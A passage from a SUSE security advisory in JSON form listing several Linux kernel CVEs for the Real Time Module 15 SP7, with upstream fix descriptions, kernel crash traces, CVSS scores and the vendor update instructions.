"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71096",
"url": "https://www.suse.com/security/cve/CVE-2025-71096"
},
{
"category": "external",
"summary": "SUSE Bug 1256606 for CVE-2025-71096",
"url": "https://bugzilla.suse.com/1256606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
